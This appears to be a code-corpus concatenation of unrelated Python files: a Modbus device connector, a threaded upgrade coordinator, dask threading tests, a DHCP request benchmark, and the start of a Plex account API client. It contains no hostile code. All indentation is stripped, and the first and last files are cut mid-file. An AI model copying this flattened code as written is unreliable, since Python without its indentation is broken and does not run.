current_device_config = self.__devices[device][CONFIG_SECTION_PARAMETER]
unit_id = current_device_config[UNIT_ID_PARAMETER]
if self.__devices[device][NEXT_PREFIX + config_section + CHECK_POSTFIX] < current_time:
self.__connect_to_current_master(device)
if not self.__current_master.is_socket_open() or not len(
current_device_config[config_section]):
continue
# Reading data from device
for interested_data in range(len(current_device_config[config_section])):
current_data = current_device_config[config_section][interested_data]
current_data[DEVICE_NAME_PARAMETER] = device
input_data = self.__function_to_device(current_data, unit_id)
device_responses[config_section][current_data[TAG_PARAMETER]] = {
"data_sent": current_data,
"input_data": input_data}
log.debug("Checking %s for device %s", config_section, device)
self.__devices[device][NEXT_PREFIX + config_section + CHECK_POSTFIX] = current_time + \
current_device_config[
config_section + POLL_PERIOD_POSTFIX] / 1000
log.debug('Device response: ', device_responses)
if device_responses.get('timeseries') or device_responses.get('attributes'):
self.__data_to_convert_queue.put((device, current_device_config, {
**current_device_config,
BYTE_ORDER_PARAMETER: current_device_config.get(BYTE_ORDER_PARAMETER,
self.__byte_order),
WORD_ORDER_PARAMETER: current_device_config.get(WORD_ORDER_PARAMETER,
self.__word_order)
}, device_responses))
except ConnectionException:
time.sleep(5)
log.error("Connection lost! Reconnecting...")
except Exception as e:
log.exception(e)
def on_attributes_update(self, content):
try:
for attribute_updates_command_config in \
self.__devices[content[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER]["attributeUpdates"]:
for attribute_updated in content[DATA_PARAMETER]:
if attribute_updates_command_config[TAG_PARAMETER] == attribute_updated:
to_process = {
DEVICE_SECTION_PARAMETER: content[DEVICE_SECTION_PARAMETER],
DATA_PARAMETER: {
RPC_METHOD_PARAMETER: attribute_updated,
RPC_PARAMS_PARAMETER: content[DATA_PARAMETER][attribute_updated]
}
}
self.__process_rpc_request(to_process, attribute_updates_command_config)
except Exception as e:
log.exception(e)
def __connect_to_current_master(self, device=None):
connect_attempt_count = 5
connect_attempt_time_ms = 100
wait_after_failed_attempts_ms = 300000
# if device is None:
# device = list(self.__devices.keys())[0]
if self.__devices[device].get(MASTER_PARAMETER) is None:
self.__devices[device][MASTER_PARAMETER], self.__devices[device][
AVAILABLE_FUNCTIONS_PARAMETER] = self.__configure_master(
self.__devices[device][CONFIG_SECTION_PARAMETER])
if self.__devices[device][MASTER_PARAMETER] != self.__current_master:
self.__current_master = self.__devices[device][MASTER_PARAMETER]
self.__available_functions = self.__devices[device][AVAILABLE_FUNCTIONS_PARAMETER]
connect_attempt_count = self.__devices[device][CONFIG_SECTION_PARAMETER].get(CONNECT_ATTEMPT_COUNT_PARAMETER,
connect_attempt_count)
if connect_attempt_count < 1:
connect_attempt_count = 1
connect_attempt_time_ms = self.__devices[device][CONFIG_SECTION_PARAMETER].get(
CONNECT_ATTEMPT_TIME_MS_PARAMETER, connect_attempt_time_ms)
if connect_attempt_time_ms < 500:
connect_attempt_time_ms = 500
wait_after_failed_attempts_ms = self.__devices[device][CONFIG_SECTION_PARAMETER].get(
WAIT_AFTER_FAILED_ATTEMPTS_MS_PARAMETER, wait_after_failed_attempts_ms)
if wait_after_failed_attempts_ms < 1000:
wait_after_failed_attempts_ms = 1000
current_time = time.time() * 1000
if not self.__current_master.is_socket_open():
if self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] >= connect_attempt_count and \
current_time - self.__devices[device][
LAST_CONNECTION_ATTEMPT_TIME_PARAMETER] >= wait_after_failed_attempts_ms:
self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] = 0
while not self.__current_master.is_socket_open() \
and self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] < connect_attempt_count \
and current_time - self.__devices[device].get(LAST_CONNECTION_ATTEMPT_TIME_PARAMETER,
0) >= connect_attempt_time_ms:
self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] = self.__devices[device][
CONNECTION_ATTEMPT_PARAMETER] + 1
self.__devices[device][LAST_CONNECTION_ATTEMPT_TIME_PARAMETER] = current_time
log.debug("Modbus trying connect to %s", device)
self.__current_master.connect()
if self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] == connect_attempt_count:
log.warn("Maximum attempt count (%i) for device \"%s\" - encountered.", connect_attempt_count,
device)
# time.sleep(connect_attempt_time_ms / 1000)
# if not self.__current_master.is_socket_open():
if self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] >= 0 and self.__current_master.is_socket_open():
self.__devices[device][CONNECTION_ATTEMPT_PARAMETER] = 0
self.__devices[device][LAST_CONNECTION_ATTEMPT_TIME_PARAMETER] = current_time
log.debug("Modbus connected to device %s.", device)
def __configure_master(self, config=None):
current_config = self.__config if config is None else config
master_config = dict()
master_config["host"] = current_config[HOST_PARAMETER] if current_config.get(
HOST_PARAMETER) is not None else self.__config.get(HOST_PARAMETER, "localhost")
try:
master_config["port"] = int(current_config[PORT_PARAMETER]) if current_config.get(
PORT_PARAMETER) is not None else self.__config.get(int(PORT_PARAMETER), 502)
except ValueError:
master_config["port"] = current_config[PORT_PARAMETER] if current_config.get(
PORT_PARAMETER) is not None else self.__config.get(PORT_PARAMETER, 502)
master_config["baudrate"] = current_config[BAUDRATE_PARAMETER] if current_config.get(
BAUDRATE_PARAMETER) is not None else self.__config.get(BAUDRATE_PARAMETER, 19200)
master_config["timeout"] = current_config[TIMEOUT_PARAMETER] if current_config.get(
TIMEOUT_PARAMETER) is not None else self.__config.get(TIMEOUT_PARAMETER, 35)
master_config["method"] = current_config[METHOD_PARAMETER] if current_config.get(
METHOD_PARAMETER) is not None else self.__config.get(METHOD_PARAMETER, "rtu")
master_config["stopbits"] = current_config[STOPBITS_PARAMETER] if current_config.get(
STOPBITS_PARAMETER) is not None else self.__config.get(STOPBITS_PARAMETER, Defaults.Stopbits)
master_config["bytesize"] = current_config[BYTESIZE_PARAMETER] if current_config.get(
BYTESIZE_PARAMETER) is not None else self.__config.get(BYTESIZE_PARAMETER, Defaults.Bytesize)
master_config["parity"] = current_config[PARITY_PARAMETER] if current_config.get(
PARITY_PARAMETER) is not None else self.__config.get(PARITY_PARAMETER, Defaults.Parity)
master_config["strict"] = current_config[STRICT_PARAMETER] if current_config.get(
STRICT_PARAMETER) is not None else self.__config.get(STRICT_PARAMETER, True)
master_config["retries"] = current_config[RETRIES_PARAMETER] if current_config.get(
RETRIES_PARAMETER) is not None else self.__config.get(RETRIES_PARAMETER, 3)
master_config["retry_on_empty"] = current_config[RETRY_ON_EMPTY_PARAMETER] if current_config.get(
RETRY_ON_EMPTY_PARAMETER) is not None else self.__config.get(RETRY_ON_EMPTY_PARAMETER, True)
master_config["retry_on_invalid"] = current_config[RETRY_ON_INVALID_PARAMETER] if current_config.get(
RETRY_ON_INVALID_PARAMETER) is not None else self.__config.get(RETRY_ON_INVALID_PARAMETER, True)
master_config["rtu"] = ModbusRtuFramer if current_config.get(METHOD_PARAMETER) == "rtu" or (
current_config.get(METHOD_PARAMETER) is None and self.__config.get(
METHOD_PARAMETER) == "rtu") else ModbusSocketFramer
if self.__previous_master_config != master_config:
self.__previous_master_config = master_config
if current_config.get(TYPE_PARAMETER) == 'tcp' or (
current_config.get(TYPE_PARAMETER) is None and self.__config.get(TYPE_PARAMETER) == "tcp"):
master = ModbusTcpClient(master_config["host"], master_config["port"], master_config["rtu"],
timeout=master_config["timeout"],
retry_on_empty=master_config["retry_on_empty"],
retry_on_invalid=master_config["retry_on_invalid"],
retries=master_config["retries"])
elif current_config.get(TYPE_PARAMETER) == 'udp' or (
current_config.get(TYPE_PARAMETER) is None and self.__config.get(TYPE_PARAMETER) == "udp"):
master = ModbusUdpClient(master_config["host"], master_config["port"], master_config["rtu"],
timeout=master_config["timeout"],
retry_on_empty=master_config["retry_on_empty"],
retry_on_invalid=master_config["retry_on_invalid"],
retries=master_config["retries"])
elif current_config.get(TYPE_PARAMETER) == 'serial' or (
current_config.get(TYPE_PARAMETER) is None and self.__config.get(TYPE_PARAMETER) == "serial"):
master = ModbusSerialClient(method=master_config["method"],
port=master_config["port"],
timeout=master_config["timeout"],
retry_on_empty=master_config["retry_on_empty"],
retry_on_invalid=master_config["retry_on_invalid"],
retries=master_config["retries"],
baudrate=master_config["baudrate"],
stopbits=master_config["stopbits"],
bytesize=master_config["bytesize"],
parity=master_config["parity"],
strict=master_config["strict"])
else:
raise Exception("Invalid Modbus transport type.")
else:
master = self.__current_master
available_functions = {
1: master.read_coils,
2: master.read_discrete_inputs,
3: master.read_holding_registers,
4: master.read_input_registers,
5: master.write_coil,
6: master.write_register,
15: master.write_coils,
16: master.write_registers,
}
return master, available_functions
def __stop_connections_to_masters(self):
for device in self.__devices:
if self.__devices[device].get(MASTER_PARAMETER) is not None:
self.__devices[device][MASTER_PARAMETER].close()
def __function_to_device(self, config, unit_id):
function_code = config.get(FUNCTION_CODE_PARAMETER)
result = None
if function_code in (1, 2, 3, 4):
result = self.__available_functions[function_code](address=config[ADDRESS_PARAMETER],
count=config.get(OBJECTS_COUNT_PARAMETER,
config.get("registersCount",
config.get("registerCount",
1))),
unit=unit_id)
elif function_code in (5, 6):
result = self.__available_functions[function_code](address=config[ADDRESS_PARAMETER],
value=config[PAYLOAD_PARAMETER],
unit=unit_id)
elif function_code in (15, 16):
result = self.__available_functions[function_code](address=config[ADDRESS_PARAMETER],
values=config[PAYLOAD_PARAMETER],
unit=unit_id)
else:
log.error("Unknown Modbus function with code: %i", function_code)
log.debug("With result %s", str(result))
if "Exception" in str(result):
log.exception(result)
return result
def server_side_rpc_handler(self, server_rpc_request):
try:
if server_rpc_request.get(DEVICE_SECTION_PARAMETER) is not None:
log.debug("Modbus connector received rpc request for %s with server_rpc_request: %s",
server_rpc_request[DEVICE_SECTION_PARAMETER],
server_rpc_request)
if isinstance(self.__devices[server_rpc_request[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER][
RPC_SECTION], dict):
rpc_command_config = \
self.__devices[server_rpc_request[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER][
RPC_SECTION].get(
server_rpc_request[DATA_PARAMETER][RPC_METHOD_PARAMETER])
if rpc_command_config is not None:
self.__process_rpc_request(server_rpc_request, rpc_command_config)
elif isinstance(self.__devices[server_rpc_request[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER][
RPC_SECTION], list):
for rpc_command_config in \
self.__devices[server_rpc_request[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER][
RPC_SECTION]:
if rpc_command_config[TAG_PARAMETER] == server_rpc_request[DATA_PARAMETER][
RPC_METHOD_PARAMETER]:
self.__process_rpc_request(server_rpc_request, rpc_command_config)
break
else:
log.error("Received rpc request, but method %s not found in config for %s.",
server_rpc_request[DATA_PARAMETER].get(RPC_METHOD_PARAMETER),
self.get_name())
self.__gateway.send_rpc_reply(server_rpc_request[DEVICE_SECTION_PARAMETER],
server_rpc_request[DATA_PARAMETER][RPC_ID_PARAMETER],
{server_rpc_request[DATA_PARAMETER][
RPC_METHOD_PARAMETER]: "METHOD NOT FOUND!"})
else:
log.debug("Received RPC to connector: %r", server_rpc_request)
except Exception as e:
log.exception(e)
def __process_rpc_request(self, content, rpc_command_config):
if rpc_command_config is not None:
rpc_command_config[UNIT_ID_PARAMETER] = \
self.__devices[content[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER][UNIT_ID_PARAMETER]
self.__connect_to_current_master(content[DEVICE_SECTION_PARAMETER])
# if rpc_command_config.get('bit') is not None:
# rpc_command_config[FUNCTION_CODE_PARAMETER] = 6
if rpc_command_config.get(FUNCTION_CODE_PARAMETER) in (5, 6, 15, 16):
rpc_command_config[PAYLOAD_PARAMETER] = self.__devices[content[DEVICE_SECTION_PARAMETER]][
DOWNLINK_PREFIX + CONVERTER_PARAMETER].convert(
rpc_command_config, content)
response = None
try:
response = self.__function_to_device(rpc_command_config, rpc_command_config[UNIT_ID_PARAMETER])
except Exception as e:
log.exception(e)
response = e
if isinstance(response, (ReadRegistersResponseBase, ReadBitsResponseBase)):
to_converter = {
RPC_SECTION: {content[DATA_PARAMETER][RPC_METHOD_PARAMETER]: {"data_sent": rpc_command_config,
"input_data": response}}}
response = self.__devices[content[DEVICE_SECTION_PARAMETER]][
UPLINK_PREFIX + CONVERTER_PARAMETER].convert(
config={**self.__devices[content[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER],
BYTE_ORDER_PARAMETER: self.__devices[content[DEVICE_SECTION_PARAMETER]][
CONFIG_SECTION_PARAMETER].get(BYTE_ORDER_PARAMETER,
self.__byte_order),
WORD_ORDER_PARAMETER: self.__devices[content[DEVICE_SECTION_PARAMETER]][
CONFIG_SECTION_PARAMETER].get(WORD_ORDER_PARAMETER,
self.__word_order)
},
data=to_converter)
log.debug("Received RPC method: %s, result: %r", content[DATA_PARAMETER][RPC_METHOD_PARAMETER],
response)
# response = {"success": response}
elif isinstance(response, (WriteMultipleRegistersResponse,
WriteMultipleCoilsResponse,
WriteSingleCoilResponse,
WriteSingleRegisterResponse)):
log.debug("Write %r", str(response))
response = {"success": True}
if content.get(RPC_ID_PARAMETER) or (
content.get(DATA_PARAMETER) is not None and content[DATA_PARAMETER].get(RPC_ID_PARAMETER)):
if isinstance(response, Exception):
self.__gateway.send_rpc_reply(content[DEVICE_SECTION_PARAMETER],
content[DATA_PARAMETER][RPC_ID_PARAMETER],
{content[DATA_PARAMETER][RPC_METHOD_PARAMETER]: str(response)})
else:
self.__gateway.send_rpc_reply(content[DEVICE_SECTION_PARAMETER],
content[DATA_PARAMETER][RPC_ID_PARAMETER],
response)
log.debug("%r", response)
|
upgrade_center.py | import time
import threading
from .base.event_base import EventBase
class UpgradeCenter(EventBase):
def __init__(self):
super(UpgradeCenter, self).__init__()
self.workers = {}
self.run_status = []
self.is_processing = False
self.is_error = False
self.current = 0
self.total = 0
self.data_lock = threading.Lock()
def register(self, worker):
worker_key = 'worker-' + str(len(self.workers))
worker.set_key(worker_key)
self.workers[worker_key] = {'executor': worker, 'current': 0}
self.total += worker.get_upgrade_content_size()
def start(self):
if self.is_processing:
print('upgrade is in processing...')
return False
self.is_processing = True
for worker in self.workers.values():
'''start thread to invoke worker's work
'''
executor = worker['executor']
thead = threading.Thread(
target=self.thread_start_worker, args=(executor,))
thead.start()
def thread_start_worker(self, executor):
executor.on('progress', self.handle_worker_progress)
executor.on('error', self.handle_worker_error)
executor.on('finish', self.handle_worker_done)
executor.work()
def handle_worker_progress(self, worker_key, current, total):
''' on single worker progress
'''
self.data_lock.acquire()
self.current = 0
self.workers[worker_key]['current'] = current
for worker in self.workers.values():
self.current += worker['current']
self.data_lock.release()
self.emit('progress', self.current, self.total)
def handle_worker_error(self, worker_key, message):
''' on worker error
'''
# notifiy other workers to stop upgrade
for worker in self.workers.values():
worker['executor'].stop()
self.emit('error', message)
def handle_worker_done(self, worker_key):
''' on worker progress
should check if all workers is done
'''
self.run_status.append(worker_key)
# print('{0} worker finished'.format(worker_key))
if len(self.run_status) == len(self.workers):
# wait a time, output data to client
time.sleep(.5)
self.emit('finish')
|
test_threaded.py | import os
import sys
import signal
import threading
from multiprocessing.pool import ThreadPool
from time import time, sleep
import pytest
import dask
from dask.compatibility import PY2
from dask.threaded import get
from dask.utils_test import inc, add
def test_get():
dsk = {'x': 1, 'y': 2, 'z': (inc, 'x'), 'w': (add, 'z', 'y')}
assert get(dsk, 'w') == 4
assert get(dsk, ['w', 'z']) == (4, 2)
def test_nested_get():
dsk = {'x': 1, 'y': 2, 'a': (add, 'x', 'y'), 'b': (sum, ['x', 'y'])}
assert get(dsk, ['a', 'b']) == (3, 3)
def test_get_without_computation():
dsk = {'x': 1}
assert get(dsk, 'x') == 1
def bad(x):
raise ValueError()
def test_exceptions_rise_to_top():
dsk = {'x': 1, 'y': (bad, 'x')}
pytest.raises(ValueError, lambda: get(dsk, 'y'))
def test_reuse_pool():
pool = ThreadPool()
with dask.config.set(pool=pool):
assert get({'x': (inc, 1)}, 'x') == 2
assert get({'x': (inc, 1)}, 'x') == 2
def test_threaded_within_thread():
L = []
def f(i):
result = get({'x': (lambda: i,)}, 'x', num_workers=2)
L.append(result)
before = threading.active_count()
for i in range(20):
t = threading.Thread(target=f, args=(1,))
t.daemon = True
t.start()
t.join()
assert L == [1]
del L[:]
start = time() # wait for most threads to join
while threading.active_count() > before + 10:
sleep(0.01)
assert time() < start + 5
def test_dont_spawn_too_many_threads():
before = threading.active_count()
dsk = {('x', i): (lambda: i,) for i in range(10)}
dsk['x'] = (sum, list(dsk))
for i in range(20):
get(dsk, 'x', num_workers=4)
after = threading.active_count()
assert after <= before + 8
def test_thread_safety():
def f(x):
return 1
dsk = {'x': (sleep, 0.05), 'y': (f, 'x')}
L = []
def test_f():
L.append(get(dsk, 'y'))
threads = []
for i in range(20):
t = threading.Thread(target=test_f)
t.daemon = True
t.start()
threads.append(t)
for thread in threads:
thread.join()
assert L == [1] * 20
@pytest.mark.xfail('xdist' in sys.modules,
reason=("This test fails intermittently when using "
"pytest-xdist (maybe)"))
def test_interrupt():
# Python 2 and windows 2 & 3 both implement `queue.get` using polling,
# which means we can set an exception to interrupt the call to `get`.
# Python 3 on other platforms requires sending SIGINT to the main thread.
if PY2:
from thread import interrupt_main
elif os.name == 'nt':
from _thread import interrupt_main
else:
main_thread = threading.get_ident()
def interrupt_main():
signal.pthread_kill(main_thread, signal.SIGINT)
def long_task():
sleep(5)
dsk = {('x', i): (long_task,) for i in range(20)}
dsk['x'] = (len, list(dsk.keys()))
try:
interrupter = threading.Timer(0.5, interrupt_main)
interrupter.start()
start = time()
get(dsk, 'x')
except KeyboardInterrupt:
pass
except Exception:
assert False, "Failed to interrupt"
stop = time()
if stop - start > 4:
assert False, "Failed to interrupt"
|
bench.py | import logging
import socket
import threading
import time
from .proto.packet import Packet
from .proto.opttypes import OptionType
from .proto.dhcpmsg import MessageType
def sync_worker(address, on_success, on_fail, oneshot=False, macaddr=None, relay_ip=None):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', 0))
sock.settimeout(1)
pkt = Packet(message_type=MessageType.REQUEST)
pkt.op = Packet.Op.REQUEST
pkt.chaddr = macaddr or 'de:12:44:4c:bb:48'
if relay_ip:
pkt.hops = 1
pkt.giaddr = relay_ip
pkt.add_option(OptionType.AgentInformation, b'\x01\x04test')
while True:
data = pkt.pack()
sent = sock.sendto(data, address)
try:
data, address = sock.recvfrom(4096)
on_success()
if oneshot:
reply = Packet.unpack_from(data)
print(reply)
except socket.timeout:
on_fail()
if oneshot:
break
def start_threaded(address, threads=1, macaddr=None, relay_ip=None):
host, port = address.split(':')
port = int(port)
success_count = 0
fail_count = 0
def inc_success():
nonlocal success_count
success_count += 1
def inc_fail():
nonlocal fail_count
fail_count += 1
for _ in range(threads):
t = threading.Thread(target=sync_worker, args=((host, port), inc_success, inc_fail, False, macaddr, relay_ip), daemon=True)
t.start()
while True:
time.sleep(1.0)
print('requests success: %s fail: %s' % (success_count, fail_count))
success_count = 0
fail_count = 0
def oneshot(address, macaddr, relay_ip):
host, port = address.split(':')
port = int(port)
sync_worker((host, port), lambda:None, lambda:None, oneshot=True, macaddr=macaddr, relay_ip=relay_ip)
|
myplex.py | # -*- coding: utf-8 -*-
import copy
import threading
import time
from xml.etree import ElementTree
import requests
from plexapi import (BASE_HEADERS, CONFIG, TIMEOUT, X_PLEX_ENABLE_FAST_CONNECT,
X_PLEX_IDENTIFIER, log, logfilter, utils)
from plexapi.base import PlexObject
from plexapi.client import PlexClient
from plexapi.exceptions import BadRequest, NotFound, Unauthorized
from plexapi.library import LibrarySection
from plexapi.server import PlexServer
from plexapi.sonos import PlexSonosClient
from plexapi.sync import SyncItem, SyncList
from requests.status_codes import _codes as codes
class MyPlexAccount(PlexObject):
""" MyPlex account and profile information. This object represents the data found Account on
the myplex.tv servers at the url https://plex.tv/users/account. You may create this object
directly by passing in your username & password (or token). There is also a convenience
method provided at :class:`~plexapi.server.PlexServer.myPlexAccount()` which will create
and return this object.
Parameters:
username (str): Your MyPlex username.
password (str): Your MyPlex password.
session (requests.Session, optional): Use your own session object if you want to
cache the http responses from PMS
timeout (int): timeout in seconds on initial connect to myplex (default config.TIMEOUT).
Attributes:
SIGNIN (str): 'https://plex.tv/users/sign_in.xml'
key (str): 'https://plex.tv/users/account'
authenticationToken (str): Unknown.
certificateVersion (str): Unknown.
cloudSyncDevice (str): Unknown.
email (str): Your current Plex email address.
entitlements (List<str>): List of devices your allowed to use with this account.
guest (bool): Unknown.
home (bool): Unknown.
homeSize (int): Unknown.
id (int): Your Plex account ID.
locale (str): Your Plex locale
mailing_list_status (str): Your current mailing list status.
maxHomeSize (int): Unknown.
queueEmail (str): Email address to add items to your `Watch Later` queue.
queueUid (str): Unknown.
restricted (bool): Unknown.
roles: (List<str>) Lit of account roles. Plexpass membership listed here.
scrobbleTypes (str): Description
secure (bool): Description
subscriptionActive (bool): True if your subsctiption is active.
subscriptionFeatures: (List<str>) List of features allowed on your subscription.
subscriptionPlan (str): Name of subscription plan.
subscriptionStatus (str): String representation of `subscriptionActive`.
thumb (str): URL of your account thumbnail.
title (str): Unknown. - Looks like an alias for `username`.
username (str): Your account username.
uuid (str): Unknown.
_token (str): Token used to access this client.
_session (obj): Requests session object used to access this client.
"""
FRIENDINVITE = 'https://plex.tv/api/servers/{machineId}/shared_servers' # post with data
HOMEUSERCREATE = 'https://plex.tv/api/home/users?title={title}' # post with data
EXISTINGUSER = 'https://plex.tv/api/home/users?invitedEmail={username}' # post with data
FRIENDSERVERS = 'https://plex.tv/api/servers/{machineId}/shared_servers/{serverId}' # put with data
PLEXSERVERS = 'https://plex.tv/api/servers/{machineId}' # get
FRIENDUPDATE = 'https://plex.tv/api/friends/{userId}' # put with args, delete
REMOVEHOMEUSER = 'https://plex.tv/api/home/users/{userId}' # delete
REMOVEINVITE = 'https://plex.tv/api/invites/requested/{userId}?friend=1&server=1&home=1' # delete
REQUESTED = 'https://plex.tv/api/invites/requested' # get
REQUESTS = 'https://plex.tv/api/invites/requests' # get
SIGNIN = 'https://plex.tv/users/sign_in.xml' # get with auth
WEBHOOKS = 'https://plex.tv/api/v2/user/webhooks' # get, post with data
OPTOUTS = 'https://plex.tv/api/v2/user/%(userUUID)s/settings/opt_outs' # get
LINK = 'https://plex.tv/api/v2/pins/link' # put
# Hub sections
VOD = 'https://vod.provider.plex.tv/' # get
WEBSHOWS = 'https://webshows.provider.plex.tv/' # get
NEWS = 'https://news.provider.plex.tv/' # get
PODCASTS = 'https://podcasts.provider.plex.tv/' # get
MUSIC = 'https://music.provider.plex.tv/' # get
# Key may someday switch to the following url. For now the current value works.
# https://plex.tv/api/v2/user?X-Plex-Token={token}&X-Plex-Client-Identifier={clientId}
key = 'https://plex.tv/users/account'
def __init__(self, username=None, password=None, token=None, session=None, timeout=None):
self._token = token or CONFIG.get('auth.server_token')
self._session = session or requests.Session()
self._sonos_cache = []
self._sonos_cache_timestamp = 0
data, initpath = self._signin(username, password, timeout)
super(MyPlexAccount, self).__init__(self, data, initpath)
def _signin(self, username, password, timeout):
if self._token:
return self.query(self.key), self.key
username = username or CONFIG.get('auth.myplex_username')
password = password or CONFIG.get('auth.myplex_password')
data = self.query(self.SIGNIN, method=self._session.post, auth=(username, password), timeout=timeout)
return data, self.SIGNIN
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self._token = logfilter.add_secret(data.attrib.get('authenticationToken'))
self._webhooks = []
self.authenticationToken = self._token
self.certificateVersion = data.attrib.get('certificateVersion')
self.cloudSyncDevice = data.attrib.get('cloudSyncDevice')
self.email = data.attrib.get('email')
self.guest = utils.cast(bool, data.attrib.get('guest'))
self.home = utils.cast(bool, data.attrib.get('home'))
self.homeSize = utils.cast(int, data.attrib.get('homeSize'))
self.id = utils.cast(int, data.attrib.get('id'))
self.locale = data.attrib.get('locale')
self.mailing_list_status = data.attrib.get('mailing_list_status')
self.maxHomeSize = utils.cast(int, data.attrib.get('maxHomeSize'))
self.queueEmail = data.attrib.get('queueEmail')
self.queueUid = data.attrib.get('queueUid')
self.restricted = utils.cast(bool, data.attrib.get('restricted'))
self.scrobbleTypes = data.attrib.get('scrobbleTypes')
self.secure = utils.cast(bool, data.attrib.get('secure'))
self.thumb = data.attrib.get('thumb')
self.title = data.attrib.get('title')
self.username = data.attrib.get('username')
self.uuid = data.attrib.get('uuid')
subscription = data.find('subscription')
self.subscriptionActive = utils.cast(bool, subscription.attrib.get('active'))
self.subscriptionStatus = subscription.attrib.get('status')
self.subscriptionPlan = subscription.attrib.get('plan')
self.subscriptionFeatures = self.listAttrs(subscription, 'id', etag='feature')
self.roles = self.listAttrs(data, 'id', rtag='roles', etag='role')
self.entitlements = self.listAttrs(data, 'id', rtag='entitlements', etag='entitlement')
# TODO: Fetch missing MyPlexAccount attributes
self.profile_settings = None
self.services = None
self.joined_at = None
def device(self, name=None, clientId=None):
""" Returns the :class:`~plexapi.myplex.MyPlexDevice` that matches the name specified.
Parameters:
name (str): Name to match against.
clientId (str): clientIdentifier to match against.
"""
for device in self.devices():
if (name and device.name.lower() == name.lower() or device.clientIdentifier == clientId):
return device
raise NotFound('Unable to find device %s' % name)
def devices(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexDevice` objects connected to the server. """
data = self.query(MyPlexDevice.key)
return [MyPlexDevice(self, elem) for elem in data]
def _headers(self, **kwargs):
""" Returns dict containing base headers for all requests to the server. """
headers = BASE_HEADERS.copy()
if self._token:
headers['X-Plex-Token'] = self._token
headers.update(kwargs)
return headers
def query(self, url, method=None, headers=None, timeout=None, **kwargs):
method = method or self._session.get
timeout = timeout or TIMEOUT
log.debug('%s %s %s', method.__name__.upper(), url, kwargs.get('json', ''))
headers = self._headers(**headers or {})
response = method(url, headers=headers, timeout=timeout, **kwargs)
if response.status_code not in (200, 201, 204): # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
message = '(%s) %s; %s %s' % (response.status_code, codename, response.url, errtext)
if response.status_code == 401:
raise Unauthorized(message)
elif response.status_code == 404:
raise NotFound(message)
else:
raise BadRequest(message)
data = response.text.encode('utf8')
return ElementTree.fromstring(data) if data.strip() else None
def resource(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexResource` that matches the name specified.
Parameters:
name (str): Name to match against.
"""
for resource in self.resources():
if resource.name.lower() == name.lower():
return resource
raise NotFound('Unable to find resource %s' % name)
def resources(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexResource` objects connected to the server. """
data = self.query(MyPlexResource.key)
return [MyPlexResource(self, elem) for elem in data]
def sonos_speakers(self):
if 'companions_sonos' not in self.subscriptionFeatures:
return []
t = time.time()
if t - self._sonos_cache_timestamp > 5:
self._sonos_cache_timestamp = t
data = self.query('https://sonos.plex.tv/resources')
self._sonos_cache = [PlexSonosClient(self, elem) for elem in data]
return self._sonos_cache
def sonos_speaker(self, name):
return next((x for x in self.sonos_speakers() if x.title.split("+")[0].strip() == name), None)
def sonos_speaker_by_id(self, identifier):
return next((x for x in self.sonos_speakers() if x.machineIdentifier.startswith(identifier)), None)
def inviteFriend(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (:class:`~plexapi.myplex.MyPlexUser`): `MyPlexUser` object, username, or email
of the user to be added.
server (:class:`~plexapi.server.PlexServer`): `PlexServer` object, or machineIdentifier
containing the library sections to share.
sections (List<:class:`~plexapi.library.LibrarySection`>): List of `LibrarySection` objecs, or names
to be shared (default None). `sections` must be defined in order to update shared libraries.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: `{'label':['foo']}`
"""
username = user.username if isinstance(user, MyPlexUser) else user
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(machineId, sections)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_email': username},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
headers = {'Content-Type': 'application/json'}
url = self.FRIENDINVITE.format(machineId=machineId)
return self.query(url, self._session.post, json=params, headers=headers)
def createHomeUser(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (:class:`~plexapi.myplex.MyPlexUser`): `MyPlexUser` object, username, or email
of the user to be added.
server (:class:`~plexapi.server.PlexServer`): `PlexServer` object, or machineIdentifier
containing the library sections to share.
sections (List<:class:`~plexapi.library.LibrarySection`>): List of `LibrarySection` objecs, or names
to be shared (default None). `sections` must be defined in order to update shared libraries.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
